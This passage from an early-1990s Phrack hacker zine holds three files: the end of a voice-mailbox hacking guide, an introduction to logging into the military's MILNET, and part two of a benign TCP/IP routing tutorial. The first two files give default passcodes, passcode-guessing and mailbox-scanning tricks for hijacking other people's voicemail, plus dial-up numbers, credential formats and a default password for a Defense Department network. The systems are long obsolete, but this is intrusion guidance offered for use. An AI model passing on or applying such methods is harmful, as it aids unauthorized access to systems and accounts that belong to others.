  1480. annoying and often identifies herself as Aspen.  When you dial up an Aspen
  1481. system, sometimes you have to enter an (*) to get into the vmb system.  Once
  1482. you're in you hit (#) to login.  The system will respond with 'Mailbox number
  1483. please?'  If you enter an invalid mailbox the first time it will say 'Mailbox
  1484. xxx is invalid...' and the second time it will say 'You dialed xxx, there is
  1485. no such number...'  and after a third incorrect entry it will hang up.  If
  1486. you enter a valid box, it will say the box owner's name and 'Please enter
  1487. your passcode.'  The most common default for Aspens is either box number or
  1488. box number + (0).  You only get three attempts to enter a correct box number
  1489. and then three attempts to enter a correct passcode until it will disconnect
  1490. you.  From the main menu of an Aspen box you can enter (3) to scan for other
  1491. boxes so you won't be hung up like you would from outside the box.
  1492.  
  1493. CINDY is another popular system.  The system will start by saying 'Good
  1494. Morning/Afternoon/Evening.  Please enter the mailbox number you wish...' and
  1495. is easy to identify.  After three invalid box entries the system will say
  1496. 'Good Day/Evening!' and hang up.  To login, enter the box number and during
  1497. the greet press (0) then your passcode.  The default for ALL Cindy systems is
  1498. (0).  From the main menu you can enter (6) to scan for other boxes so you
  1499. won't be hung up.  Cindy voice mail systems also have a guest feature, like
  1500. Aspens.  You can make a guest account for someone, and give them
  1501. password, and leave them messages.  To access their guest account, they just
  1502. login as you would except they enter their guest passcode.  Cindy systems
  1503. also have a feature where you can have it call a particular number and
  1504. deliver a recorded message.  However, I have yet to get this feature to work
  1505. on any Cindy boxes that I have.
  1506.  
  1507. MESSAGE CENTER is also very popular, especially with direct dials.  To login
  1508. on a Message Center, hit the (*) key during the greet and the system will
  1509. respond with 'Hello <name>.  Please enter your passcode.'  These vmbs are
  1510. very tricky with their passcode methods.  The first trick is when you enter
  1511. an invalid passcode it will stop you one digit AFTER the maximum passcode
  1512. length.  Eg. If you enter 1-2-3-4-5 and it gives you an error message you enter
  1513.  the fifth digit, that means the system uses a four digit passcode,
  1514. which is most common on Message Centers.  The second trick is that if you enter
  1515. an invalid code the first time, no matter what you enter as the second passcode
  1516. it will give you an error message and ask again.  Then if you entered the
  1517. correct passcode the second and third time it will let you login.  Also, most
  1518. Message Centers do not have a default, instead the new boxes are 'open' and
  1519. when you hit (*) it will let you in.  After hitting (*) the first time to
  1520. login a box you can hit (*) again and it will say 'Welcome to the Message
  1521. Center.' and from there you can dial other extensions.  This last feature can
  1522. be useful for scanning outside a box.  To find a new box, just keep entering
  1523. box numbers and hitting (*) to login.  If it doesn't say something to the
  1524. effect of welcome to your new mailbox then just hit (*) again and it will
  1525. send you back to the main system so you can enter another box.  This way you
  1526. will not be disconnected.  Once you find a box, you can enter (6) 'M'ake a
  1527. message to scan for other boxes with generic names.  After hitting (6) it
  1528. will ask for a mailbox number.  You can keep entering mailbox numbers until
  1529. you find a generic one.  Then you can cancel your message and go hack it out.
  1530.  
  1531.  
  1532. Q VOICE MAIL is a rather nice system but not as common.  It identifies itself
  1533. 'Welcome to Q Voice Mail Paging' so there is no question about what system it
  1534. is.  The box numbers are usually five digits and to login you enter (0) like
  1535. a Cindy system.  From the main menu you can enter (3) to scan other boxes.
  1536.  
  1537. There are many more systems I recognize but do not know the name for them.
  1538. You will become familiar with these systems too.
  1539.  
  1540.  
  1541. CONCLUSION
  1542.  
  1543. You can use someone else's vmb system to practice the methods outlined above,
  1544. but if you want a box that will last you need to scan out a virgin system.
  1545. If you did everything above and could not get a vmb, try again on another
  1546. system.  If you follow everything correctly, I guarantee you will have more
  1547. vmbs than you know what to do with.  When you start getting a lot of them, if
  1548. you are having trouble, or just want to say hi be sure to drop me a line on
  1549. either of my internet addresses, or leave me a voice mail message.
  1550.  
  1551. NOTE:  Some information was purposely not included in this file to prevent
  1552. abuse to various systems.
  1553.  
  1554.  
  1555.                                Night Ranger
  1556.                         gbatson@clutx.clarkson.edu
  1557.  
  1558.                  1-800-666-2336  Box 602  (After Business Hours)
  1559.                  1-800-435-2008  Box 896  (After Business Hours)
  1560. _______________________________________________________________________________
  1561.  
  1562.                                 ==Phrack Inc.==
  1563.  
  1564.                 Volume Three, Issue Thirty-four, File #7 of 11
  1565.                      _____________________________________
  1566.                     |                                     |
  1567.                     |  : : : : : : : : : : : : : : : : :  |
  1568.                     |  :    Brigadier General Swipe    :  |
  1569.                     |  : : : : : : : : : : : : : : : : :  |
  1570.                     |                                     |
  1571.                     |              presents:              |
  1572.                      _____________________________________
  1573.  
  1574.                     |                                     |
  1575.                     |      An Introduction to MILNET      |
  1576.                     |                                     |
  1577.                     |_____________________________________|
  1578.  
  1579.         : :Introduction: :
  1580.  
  1581.      First of all MILNET is a system used by branches of the military for
  1582. unclassified communications.  MILNET produces that infamous TAC login xxx.  TAC
  1583. MILNET is run out of the University of Southern California.  USC is the ISI
  1584. master dial up.  I would also like to point out that the Department of Defense
  1585. tends to frown on people browsing through there system.  With that in mind,
  1586. here is a basic overview of MILNET operations.
  1587.  
  1588.         : :Logging On: :
  1589.  
  1590.     MILNET can be reached over through the "nets" or can be directly connected
  1591. to by dialing 1-800-368-2217 or 213-306-1366.  The later is the ISI master dial
  1592. up.  Most military bases connect through the 800 dial up owned by AT&T.
  1593.  
  1594. ISIE MASTER LOGON PROCEDURE
  1595. ----------------------------
  1596. 1> call 213-306-1366
  1597. 2> when the phone stops ringing you are connected
  1598. 3> enter location number (9 digits) + 1 or 0
  1599. 4> hang up and it will call you
  1600. 5> pick up the phone and hit the '*' on your phone
  1601. 6> hit a carriage return on the computer
  1602. 7> at the 'what class?' prompt hit RETURN
  1603. 8> then a 'go' prompt will appear and log on as you would the 800 number.
  1604.  
  1605. MILNET LOGIN PROCEDURE
  1606. -----------------------
  1607. > When you first connect you will see:
  1608.  
  1609. 'WELCOME TO DDN. FOR OFFICIAL USE ONLY.TAC LOGIN
  1610. CALL NIC 1-800-235-3155 FOR HELP
  1611. WRPAT TAC 113 #:36
  1612.  
  1613. > the person logging on types:
  1614.  
  1615. @o 1/103
  1616.  
  1617.  YOU ALWAYS TYPE @o then other connections are:
  1618.                           ISIA             3/103
  1619.                           ISIB          10:3/52
  1620.                           ISID          10:0/27
  1621.                           ISIE             1/103    (THE EXAMPLE)
  1622.                           ISIF             2/103
  1623.                           VAX A         10:2/27
  1624.  
  1625. > Next you will see a 'USER-ID' prompt. The first 4 characters vary but it is
  1626. is always followed by a '-' and what ever connection you choose.
  1627.  
  1628. User-Id:   (example)  CER5-ISIE or MRW1-ISIE
  1629.  
  1630. > The first three letters are the initials of the user followed by a random
  1631. number (1-9).
  1632.  
  1633. Access Code: (example) 2285UNG6A or 22L8KK5CH
  1634.  
  1635. > An access code will never contain a ( 1, 0, G, Z).
  1636.  
  1637. @ USERNAME + PASSWORD        IE USERNAME SAC.512AREFW-LGTO
  1638.  
  1639. THE USERNAME EXPLANATION:
  1640. -------------------------
  1641.      The first 3 letters in the example given above are SAC. This stands for
  1642. Strategic Air Command, a branch of the Air Force.  Following that is a "."
  1643. Then the unit number and the prime mission.  In this case 512AREFW", (512th
  1644. AIR REFUELING WING).  Then a '-' and the Individual Squadron name 'LGTO'
  1645. (LOGISTICS GROUND TRANSPORTATION OPERATIONS), a fancy name for the motor pool.
  1646.      The password will not be echoed back and should be entered after the
  1647. username.  The new user password as a default is: NEW-UZER-ACNT.
  1648.  
  1649.         : :Options: :
  1650.  
  1651. PROGRAMS AVAILABLE TO SAC USERS:
  1652. -------------------------------
  1653.  
  1654. ADUTY   aids in management of additional duty assignments.
  1655.         (International help - use the ? and <ESC> keys, HELP.)
  1656.  
  1657. ARCHIVE requests files to be stored on tape for later retrieval.
  1658.         (Type HELP ARCHIVE <RET> at TOPS-20.)
  1659.  
  1660. CHAT    Provides near real time communication between terminal users on the
  1661.           same host computer.
  1662.         (Use ? with CHAT.)
  1663.  
  1664. DAILY   Executive appointment scheduling program
  1665.  
  1666. DCOPY   Handles output on DIABLO and XEROX printers
  1667.  
  1668. EMACS   Powerful full-screen text editor
  1669. FOLLOW  Suspense follow up program
  1670.  
  1671. FTP     provides file transfer capabilities between host computers
  1672.  
  1673. FKEYS   allows user to define function key (real spiffaruni)
  1674.  
  1675. HELP    the command used by stupid generals or hackers that have never used
  1676.         milnet before
  1677.  
  1678. HERMES  E-Mail
  1679.  
  1680. NCPCALC spreadsheet program
  1681.  
  1682. PHOTO   saves transcripts of sessions
  1683.  
  1684. REMIND  sends user-created reminders
  1685.  
  1686. RIPSORT a sophisticated data sorting program
  1687.         (Described in SAC's User manual (sorry))
  1688.  
  1689. SCRIBE  a powerful text formatter for preparing documents.
  1690.         (ISI's manual, SCRIBE manual - soon on MILNET V.2)
  1691.  
  1692. SPELL   text file spelling checker.
  1693.         (HELP at TOPS-20 and <DOCUMENTATION> directory international help -?)
  1694.  
  1695. SUSCON  allows the creating, sending, and clearing of suspenses.
  1696.         (international help - ? and <ESC>, HELP command)
  1697.  
  1698. TACOPY  used for printing hard copies of files
  1699.         (international help - ?)
  1700.  
  1701. TALK    pretty much the same as chat.
  1702.  
  1703. TIPCOPY predecessor of TACOPY
  1704.  
  1705. TEACH-EMACS     (SELF EXPLANATORY: GIVES LIST OF COMMANDS)
  1706.  
  1707. TN      Tel-Net provides multi-host access on MILNET.
  1708.         (HELP at TOPS-20 and <DOCUMENTATION> directory,
  1709.          international help - use ? and <ESC>)
  1710.  
  1711. XED     line oriented text editor.
  1712.         (HELP at TOPS-20 and <DOCUMENTATION> directory)
  1713.  
  1714.         : :Logging Out: :
  1715.  
  1716. TYPE:  @L
  1717.  
  1718.         : :ID Card: :
  1719.  
  1720.      When a user gets a MILNET account he/she receives a card in the mail that
  1721. looks similar to the diagram below.  It is credit card sized and will be blue &
  1722. white.
  1723.  _______________________________________
  1724. /                                       \
  1725. | HOST USC-ISIE 26.1.0.103              |
  1726. | HOST ADMINISTRATOR GORDON,VICKI L.    |
  1727. |---------------------------------------|
  1728. | DDN CARD HOLDER:                      |
  1729. | SMITH, BILL A, 1st LT.                |
  1730. | CARD 418475                           |
  1731. |---------------------------------------|
  1732. | USER ID:CER5-ISIE                     |
  1733. | ACCESS CODE:2285ANI6A                 |
  1734. | USERNAME: SAC.512AREFW-LGTO           |
  1735. | PASSWORD: NEW-UZER-ACNT               |
  1736. \_______________________________________/
  1737. _______________________________________________________________________________
  1738.  
  1739. : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : :
  1740. _______________________________________________________________________________
  1741.  
  1742.  
  1743.                             ==Phrack Inc.==
  1744.  
  1745.                 Volume Three, Issue Thirty-Four, File #8 of 11
  1746.  
  1747.                 A TCP/IP Tutorial : Behind The Internet
  1748.                             Part Two of Two
  1749.  
  1750.                            October 4th, 1991
  1751.  
  1752.                          Presented by  The Not
  1753.  
  1754. 5.  Internet Protocol
  1755.  
  1756.    The IP module is central to internet technology and the essence of IP
  1757.    is its route table.  IP uses this in-memory table to make all
  1758.    decisions about routing an IP packet.  The content of the route table
  1759.    is defined by the network administrator.  Mistakes block
  1760.    communication.
  1761.  
  1762.    To understand how a route table is used is to understand
  1763.    internetworking.  This understanding is necessary for the successful
  1764.    administration and maintenance of an IP network.
  1765.  
  1766.    The route table is best understood by first having an overview of
  1767.    routing, then learing about IP network addresses, and then looking
  1768.    at the details.
  1769.  
  1770. 5.1  Direct Routing
  1771.  
  1772.    The figure below is of a tiny internet with 3 computers: A, B, and C.
  1773.    Each computer has the same TCP/IP protocol stack as in Figure 1.
  1774.    Each computer's Ethernet interface has its own Ethernet address.
  1775.    Each computer has an IP address assigned to the IP interface by the
  1776.    network manager, who also has assigned an IP network number to the
  1777.    Ethernet.
  1778.  
  1779.                           A      B      C
  1780.                           |      |      |
  1781.                         --o------o------o--
  1782.                         Ethernet 1
  1783.                         IP network "development"
  1784.  
  1785.                        Figure 6.  One IP Network
  1786.  
  1787.    When A sends an IP packet to B, the IP header contains A's IP address
  1788.    as the source IP address, and the Ethernet header contains A's
  1789.    Ethernet address as the source Ethernet address.  Also, the IP header
  1790.    contains B's IP address as the destination IP address and the
  1791.    Ethernet header contains B's Ethernet address as the des
  1792.                 ----------------------------------------
  1793.                 |address            source  destination|
  1794.                 ----------------------------------------
  1795.                 |IP header          A       B          |
  1796.                 |Ethernet header    A       B          |
  1797.                 ----------------------------------------
  1798.        TABLE 5.  Addresses in an Ethernet frame for an IP packet
  1799.                               from A to B
  1800.  
  1801.    For this simple case, IP is overhead because the IP adds little to
  1802.    the service offered by Ethernet.  However, IP does add cost: the
  1803.    extra CPU processing and network bandwidth to generate, transmit, and
  1804.    parse the IP header.
  1805.  
  1806.    When B's IP module receives the IP packet from A, it checks the
  1807.    destination IP address against its own, looking for a match, then it
  1808.    passes the datagram to the upper-level protocol.
  1809.  
  1810.    This communication between A and B uses direct routing.
  1811.  
  1812. 5.2  Indirect Routing
  1813.  
  1814.    The figure below is a more realistic view of an internet.  It is
  1815.    composed of 3 Ethernets and 3 IP networks connected by an IP-router
  1816.    called computer D.  Each IP network has 4 computers; each computer
  1817.    has its own IP address and Ethernet address.
  1818.  
  1819.           A      B      C      ----D----      E      F      G
  1820.           |      |      |      |   |   |      |      |      |
  1821.         --o------o------o------o-  |  -o------o------o------o--
  1822.         Ethernet 1                 |  Ethernet 2
  1823.         IP network "development"   |  IP network "accounting"
  1824.                                    |
  1825.                                    |
  1826.                                    |     H      I      J
  1827.                                    |     |      |      |
  1828.                                  --o-----o------o------o--
  1829.                                   Ethernet 3
  1830.                                   IP network "factory"
  1831.  
  1832.                Figure 7.  Three IP Networks; One internet
  1833.  
  1834.    Except for computer D, each computer has a TCP/IP protocol stack like
  1835.    that in Figure 1.  Computer D is the IP-router; it is connected to
  1836.    all 3 networks and therefore has 3 IP addresses and 3 Ethernet
  1837.    addresses.  Computer D has a TCP/IP protocol stack similar to that in
  1838.    Figure 3, except that it has 3 ARP modules and 3 Ethernet drivers
  1839.    instead of 2.  Please note that computer D has only one IP module.
  1840.  
  1841.    The network manager has assigned a unique number, called an IP
  1842.    network number, to each of the Ethernets.  The IP network numbers are
  1843.    not shown in this diagram, just the network names.
  1844.  
  1845.    When computer A sends an IP packet to computer B, the process is
  1846.    identical to the single network example above.  Any communication
  1847.    between computers located on a single IP network matches the direct
  1848.    routing example discussed previously.
  1849.  
  1850.    When computer D and A communicate, it is direct communication.  When
  1851.    computer D and E communicate, it is direct communication.  When
  1852.    computer D and H communicate, it is direct communication.  This is
  1853.    because each of these pairs of computers is on the same IP network.
  1854.  
  1855.    However, when computer A communicates with a computer on the far side
  1856.    of the IP-router, communication is no longer direct.  A must use D to
  1857.    forward the IP packet to the next IP network.  This communication is
  1858.    called "indirect".
  1859.  
  1860.    This routing of IP packets is done by IP modules and happens
  1861.    transparently to TCP, UDP, and the network applications.
  1862.  
  1863.    If A sends an IP packet to E, the source IP address and the source
  1864.    Ethernet address are A's.  The destination IP address is E's, but
  1865.    because A's IP module sends the IP packet to D for forwarding, the
  1866.    destination Ethernet address is D's.
  1867.  
  1868.                 ----------------------------------------
  1869.                 |address            source  destination|
  1870.                 ----------------------------------------
  1871.                 |IP header          A       E          |
  1872.                 |Ethernet header    A       D          |
  1873.                 ----------------------------------------
  1874.        TABLE 6.  Addresses in an Ethernet frame for an IP packet
  1875.                          from A to E (before D)
  1876.  
  1877.    D's IP module receives the IP packet and upon examining the
  1878.    destination IP address, says "This is not my IP address," and sends
  1879.    the IP packet directly to E.
  1880.  
  1881.                 ----------------------------------------
  1882.                 |address            source  destination|
  1883.                 ----------------------------------------
  1884.                 |IP header          A       E          |
  1885.                 |Ethernet header    D       E          |
  1886.                 ----------------------------------------
  1887.        TABLE 7.  Addresses in an Ethernet frame for an IP packet
  1888.                          from A to E (after D)
  1889.  
  1890.    In summary, for direct communication, both the source IP address and
  1891.    the source Ethernet address is the sender's, and the destination IP
  1892.    address and the destination Ethernet addrss is the recipient's.  For
  1893.    indirect communication, the IP address and Ethernet addresses do not
  1894.    pair up in this way.
  1895.  
  1896.    This example internet is a very simple one.  Real networks are often
  1897.    complicated by many factors, resulting in multiple IP-routers and
  1898.    several types of physical networks.  This example internet might have
  1899.    come about because the network manager wanted to split a large
  1900.    Ethernet in order to localize Ethernet broadcast traffic.
  1901.  
  1902. 5.3  IP Module Routing Rules
  1903.  
  1904.    This overview of routing has shown what happens, but not how it
  1905.    happens.  Now let's examine the rules, or algorithm, used by the IP
  1906.    module.
  1907.  
  1908.      For an outgoing IP packet, entering IP from an upper layer, IP must
  1909.      decide whether to send the IP packet directly or indirectly, and IP
  1910.      must choose a lower network interface.  These choices are made by
  1911.      consulting the route table.
  1912.  
  1913.      For an incoming IP packet, entering IP from a lower interface, IP
  1914.      must decide whether to forward the IP packet or pass it to an upper
  1915.      layer.  If the IP packet is being forwarded, it is treated as an
  1916.      outgoing IP packet.
  1917.  
  1918.      When an incoming IP packet arrives it is never forwarded back out
  1919.      through the same network interface.
  1920.  
  1921.    These decisions are made before the IP packet is handed to the lower
  1922.    interface and before the ARP table is consulted.
  1923.  
  1924. 5.4  IP Address
  1925.  
  1926.    The network manager assigns IP addresses to computers according to
  1927.    the IP network to which the computer is attached.  One part of a 4-
  1928.    byte IP address is the IP network number, the other part is the IP
  1929.    computer number (or host number).  For the computer in table 1, with
  1930.    an IP address of 223.1.2.1, the network number is 223.1.2 and the
  1931.    host number is number 1.
  1932.  
  1933.    The portion of the address that is used for network number and for
  1934.    host number is defined by the upper bits in the 4-byte address.  All
  1935.    example IP addresses in this tutorial are of type class C, meaning
  1936.    that the upper 3 bits indicate that 21 bits are the network number
  1937.    and 8 bits are the host number.  This allows 2,097,152 class C
  1938.    networks up to 254 hosts on each network.
  1939.  
  1940.    The IP address space is administered by the NIC (Network Information
  1941.    Center).  All internets that are connected to the single world-wide
  1942.    Internet must use network numbers assigned by the NIC.  If you are
  1943.    setting up your own internet and you are not intending to connect it
  1944.    to the Internet, you should still obtain your network numbers from
  1945.    the NIC.  If you pick your own number, you run the risk of confusion
  1946.    and chaos in the eventuality that your internet is connected to
  1947.    another internet.
  1948.  
  1949. 5.5  Names
  1950.  
  1951.    People refer to computers by names, not numbers.  A computer called
  1952.    alpha might have the IP address of 223.1.2.1.  For small networks,
  1953.    this name-to-address translation data is often kept on each computer
  1954.    in the "hosts" file.  For larger networks, this translation data file
  1955.    is stored on a server and accessed across the network when needed.  A
  1956.    few lines from that file might look like this:
  1957.  
  1958.    223.1.2.1     alpha
  1959.    223.1.2.2     beta
  1960.    223.1.2.3     gamma
  1961.    223.1.2.4     delta
  1962.    223.1.3.2     epsilon
  1963.    223.1.4.2     iota
  1964.  
  1965.    The IP address is the first column and the computer name is the
  1966.    second column.
  1967.  
  1968.    In most cases, you can install identical "hosts" files on all
  1969.    computers.  You may notice that "delta" has only one entry in this
  1970.    file even though it has 3 IP addresses.  Delta can be reached with
  1971.    any of its IP addresses; it does not matter which one is used.  When
  1972.    delta receives an IP packet and looks at the destination address, it
  1973.    will recognize any of its own IP addresses.
  1974.  
  1975.    IP networks are also given names.  If you have 3 IP networks, your
  1976.    "networks" file for documenting these names might look something like
  1977.    this:
  1978.  
  1979.    223.1.2     development
  1980.    223.1.3     accounting
  1981.    223.1.4     factory
  1982.  
  1983.    The IP network number is in the first column and its name is in the
  1984.    second column.
  1985.  
  1986.    From this example you can see that alpha is computer number 1 on the
  1987.    development network, beta is computer number 2 on the development
  1988.    network and so on.  You might also say that alpha is development.1,
  1989.    Beta is development.2, and so on.
  1990.  
  1991.    The above hosts file is adequate for the users, but the network
  1992.    manager will probably replace the line for delta with:
  1993.  
  1994.    223.1.2.4     devnetrouter    delta
  1995.    223.1.3.1     facnetrouter
  1996.    223.1.4.1     accnetrouter
  1997.  
  1998.    These three new lines for the hosts file give each of delta's IP
  1999.    addresses a meaningful name.  In fact, the first IP address listed
  2000.    has 2 names; "delta" and "devnetrouter" are synonyms.  In practice
  2001.    "delta" is the general-purpose name of the computer and the other 3
  2002.    names are only used when administering the IP route table.
  2003.  
  2004.    These files are used by network administration commands and network
  2005.    applications to provide meaningful names.  They are not required for
  2006.    operation of an internet, but they do make it easier for us.
  2007.  
  2008. 5.6  IP Route Table
  2009.  
  2010.    How does IP know which lower network interface to use when sending
  2011.    out a IP packet?  IP looks it up in the route table using a search
  2012.    key of the IP network number extracted from the IP destination
  2013.    address.
  2014.  
  2015.    The route table contains one row for each route.  The primary columns
  2016.    in the route table are:  IP network number, direct/indirect flag,
  2017.    router IP address, and interface number.  This table is referred to
  2018.    by IP for each outgoing IP packet.
  2019.  
  2020.    On most computers the route table can be modified with the "route"
  2021.    command.  The content of the route table is defined by the network
  2022.    manager, because the network manager assigns the IP addresses to the
  2023.    computers.
  2024.  
  2025. 5.7  Direct Routing Details
  2026.  
  2027.    To explain how it is used, let us visit in detail the routing
  2028.    situations we have reviewed previously.
  2029.  
  2030.                         ---------        ---------
  2031.                         | alpha |         | beta  |
  2032.                         |    1  |         |  1    |
  2033.                         ---------         ---------
  2034.                              |               |
  2035.                      --------o---------------o-
  2036.                       Ethernet 1
  2037.                       IP network "development"
  2038.  
  2039.                Figure 8.  Close-up View of One IP Network
  2040.  
  2041.    The route table inside alpha looks like this:
  2042.  
  2043.      --------------------------------------------------------------
  2044.      |network      direct/indirect flag  router   interface number|
  2045.      --------------------------------------------------------------
  2046.      |development  direct                <blank>  1               |
  2047.      --------------------------------------------------------------
  2048.                   TABLE 8.  Example Simple Route Table
  2049.  
  2050.    This view can be seen on some UNIX systems with the "netstat -r"
  2051.    command.  With this simple network, all computers have identical
  2052.    routing tables.
  2053.  
  2054.    For discussion, the table is printed again without the network number
  2055.    translated to its network name.
  2056.  
  2057.      --------------------------------------------------------------
  2058.      |network      direct/indirect flag  router   interface number|
  2059.      --------------------------------------------------------------
  2060.      |223.1.2      direct                <blank>  1               |
  2061.      --------------------------------------------------------------
  2062.            TABLE 9.  Example Simple Route Table with Numbers
  2063.  
  2064. 5.8  Direct Scenario
  2065.  
  2066.    Alpha is sending an IP packet to beta.  The IP packet is in alpha's
  2067.    IP module and the destination IP address is beta or 223.1.2.2.  IP
  2068.    extracts the network portion of this IP address and scans the first
  2069.    column of the table looking for a match.  With this network a match
  2070.    is found on the first entry.
  2071.  
  2072.    The other information in this entry indicates that computers on this
  2073.    network can be reached directly through interface number 1.  An ARP
  2074.    table translation is done on beta's IP address then the Ethernet
  2075.    frame is sent directly to beta via interface number 1.
  2076.  
  2077.    If an application tries to send data to an IP address that is not on
  2078.    the development network, IP will be unable to find a match in the
  2079.    route table.  IP then discards the IP packet.  Some computers provide
  2080.    a "Network not reachable" error message.
  2081.  
  2082. 5.9  Indirect Routing Details
  2083.  
  2084.    Now, let's take a closer look at the more complicated routing
  2085.    scenario that we examined previously.
  2086.  
  2087.           ---------           ---------           ---------
  2088.           | alpha |           | delta |           |epsilon|
  2089.           |    1  |           |1  2  3|           |   1   |
  2090.           ---------           ---------           ---------
  2091.                |               |  |  |                |
  2092.        --------o---------------o- | -o----------------o--------
  2093.         Ethernet 1                |     Ethernet 2
  2094.         IP network "Development"  |     IP network "accounting"
  2095.                                   |
  2096.                                   |     --------
  2097.                                   |     | iota |
  2098.                                   |     |  1   |
  2099.                                   |     --------
  2100.                                   |        |
  2101.                                 --o--------o--------
  2102.                                     Ethernet 3
  2103.                                     IP network "factory"
  2104.  
  2105.              Figure 9.  Close-up View of Three IP Networks
  2106.  
  2107.    The route table inside alpha looks like this:
  2108.  
  2109.  ---------------------------------------------------------------------
  2110.  |network      direct/indirect flag  router          interface number|
  2111.  ---------------------------------------------------------------------
  2112.  |development  direct                <blank>         1               |
  2113.  |accounting   indirect              devnetrouter    1               |
  2114.  |factory      indirect              devnetrouter    1               |
  2115.  --------------------------------------------------------------------
  2116.                       TABLE 10.  Alpha Route Table
  2117.  
  2118.    For discussion the table is printed again using numbers instead of
  2119.    names.
  2120.  
  2121.   --------------------------------------------------------------------
  2122.   |network      direct/indirect flag  router         interface number|
  2123.   --------------------------------------------------------------------
  2124.   |223.1.2      direct                <blank>        1               |
  2125.   |223.1.3      indirect              223.1.2.4      1               |
  2126.   |223.1.4      indirect              223.1.2.4      1               |
  2127.   --------------------------------------------------------------------
  2128.                TABLE 11.  Alpha Route Table with Numbers
  2129.  
  2130.    The router in Alpha's route table is the IP address of delta's
  2131.    connection to the development network.
  2132.  
  2133. 5.10  Indirect Scenario
  2134.  
  2135.    Alpha is sending an IP packet to epsilon.  The IP packet is in
  2136.    alpha's IP module and the destination IP address is epsilon
  2137.    (223.1.3.2).  IP extracts th network portion of this IP address
  2138.    (223.1.3) and scans the first column of the table looking for a
  2139.    match.  A match is found on the second entry.
  2140.  
  2141.    This entry indicates that computers on the 223.1.3 network can be
  2142.    reached through the IP-router devnetrouter.  Alpha's IP module then
  2143.    does an ARP table translation for devnetrouter's IP address and sends
  2144.    the IP packet directly to devnetrouter through Alpha's interface
  2145.    number 1.  The IP packet still contains the destination address of
  2146.    epsilon.
  2147.  
  2148.    The IP packet arrives at delta's development network interface and is
  2149.    passed up to delta's IP module.  The destination IP address is
  2150.    examined and because it does not match any of delta's own IP
  2151.    addresses, delta decides to forward the IP packet.
  2152.  
  2153.    Delta's IP module extracts the network portion of the destination IP
  2154.    address (223.1.3) and scans its route table for a matching network
  2155.    field.  Delta's route table looks like this:
  2156.  
  2157.  ----------------------------------------------------------------------
  2158.  |network      direct/indirect flag  router           interface number|
  2159.  ----------------------------------------------------------------------
  2160.  |development  direct                <blank>          1               |
  2161.  |factory      direct                <blank>          3               |
  2162.  |accounting   direct                <blank>          2               |
  2163.  ----------------------------------------------------------------------
  2164.                      TABLE 12.  Delta's Route Table
  2165.  
  2166.    Below is delta's table printed again, without the translation to
  2167.    names.
  2168.  
  2169.  ----------------------------------------------------------------------
  2170.  |network      direct/indirect flag  router           interface number|
  2171.  ----------------------------------------------------------------------
  2172.  |223.1.2      direct                <blank>          1               |
  2173.  |223.1.3      direct                <blank>          3               |
  2174.  |223.1.4      direct                <blank>          2               |
  2175.  ----------------------------------------------------------------------
  2176.               TABLE 13.  Delta's Route Table with Numbers
  2177.  
  2178.    The match is found on the second entry.  IP then sends the IP packet
  2179.    directly to epsilon through interface number 3.  The IP packet
  2180.    contains the IP destination address of epsilon and the Ethernet
  2181.    destination address of epsilon.
  2182.  
  2183.    The IP packet arrives at epsilon and is passed up to epsilon's IP
  2184.    module.  The destination IP address is examined and found to match
  2185.    with epsilon's IP address, so the IP packet is passed to the upper
  2186.    protocol layer.
  2187.  
  2188. 5.11  Routing Summary
  2189.  
  2190.    When a IP packet travels through a large internet it may go through
  2191.    many IP-routers before it reaches its destination.  The path it takes
  2192.    is not determined by a central source but is a result of consulting
  2193.    each of the routing tables used in the journey.  Each computer
  2194.    defines only the next hop in the journey and relies on that computer
  2195.    to send the IP packet on its way.
  2196.  
  2197. 5.12  Managing the Routes
  2198.  
  2199.    Maintaining correct routing tables on all computers in a large
  2200.    internet is a difficult task; network configuration is being modified
  2201.    constantly by the network managers to meet changing needs.  Mistakes
  2202.    in routing tables can block communication in ways that are
  2203.    excruciatingly tedious to diagnose.
  2204.  
  2205.    Keeping a simple network configuration goes a long way towards making
  2206.    a reliable internet.  For instance, the most straightforward method
  2207.    of assigning IP networks to Ethernet is to assign a single IP network
  2208.    number to each Ethernet.
  2209.  
  2210.    Help is also available from certain protocols and network
  2211.    applications.  ICMP (Internet Control Message Protocol) can report
  2212.    some routing problems.  For small networks the route table is filled
  2213.    manually on each computer by the network administrator.  For larger
  2214.    networks the network administrator automates this manual operation
  2215.    with a routing protocol to distribute routes throughout a network.
  2216.  
  2217.    When a computer is moved from one IP network to another, its IP
  2218.    address must change.  When a computer is removed from an IP network
  2219.    its old address becomes invalid.  These changes require frequent
  2220.    updates to the "hosts" file.  This flat file can become difficult to
  2221.    maintain for even medium-size networks.  The Domain Name System helps
  2222.    solve these problems.
  2223.  
  2224. 6.  User Datagram Protocol
  2225.  
  2226.    UDP is one of the two main protocols to reside on top of IP.  It
  2227.    offers service to the user's network applications.  Example network
  2228.    applications that use UDP are:  Network File System (NFS) and Simple
  2229.    Network Management Protocol (SNMP).  The service is little more than
  2230.    an interface to IP.
  2231.  
  2232.    UDP is a connectionless datagram delivery service that does not
  2233.    guarantee delivery.  UDP does not maintain an end-to-end connection
  2234.    with the remote UDP module; it merely pushes the datagram out on the
  2235.    net and accepts incoming datagrams off the net.
  2236.  
  2237.    UDP adds two values to what is provided by IP.  One is the
  2238.    multiplexing of information between applications based on port
  2239.    number.  The other is a checksum to check the integrity of the data.
  2240.  
  2241. 6.1  Ports
  2242.  
  2243.    How does a client on one computer reach the server on another?
  2244.  
  2245.    The path of communication between an application and UDP is through
  2246.    UDP ports.  These ports are numbered, beginning with zero.  An
  2247.    application that is offering service (the server) waits for messages
  2248.    to come in on a specific port dedicated to that service.  The server
  2249.    waits patiently for any client to request service.
  2250.  
  2251.    For instance, the SNMP server, called an SNMP agent, always waits on
  2252.    port 161.  There can be only one SNMP agent per computer because
  2253.    there is only one UDP port number 161.  This port number is well
  2254.    known; it is a fixed number, an internet assigned number.  If an SNMP
  2255.    client wants service, it sends its request to port number 161 of UDP
  2256.    on the destination computer.
  2257.  
  2258.    When an application sends data out through UDP it arrives at the far
  2259.    end as a single unit.  For example, if an application does 5 writes
  2260.    to the UDP port, the application at the far end will do 5 reads from
  2261.    the UDP port.  Also, the size of each write matches the size of each
  2262.    read.
  2263.  
  2264.    UDP preserves the message boundary defined by the application.  It
  2265.    never joins two application messages together, or divides a single
  2266.    application message into parts.
  2267.  
  2268. 6.2  Checksum
  2269.  
  2270.    An incoming IP packet with an IP header type field indicating "UDP"
  2271.    is passed up to the UDP module by IP.  When the UDP module receives
  2272.    the UDP datagram from IP it examines the UDP checksum.  If the
  2273.    checksum is zero, it means that checksum was not calculated by the
  2274.    sender and can be ignored.  Thus the sending computer's UDP module
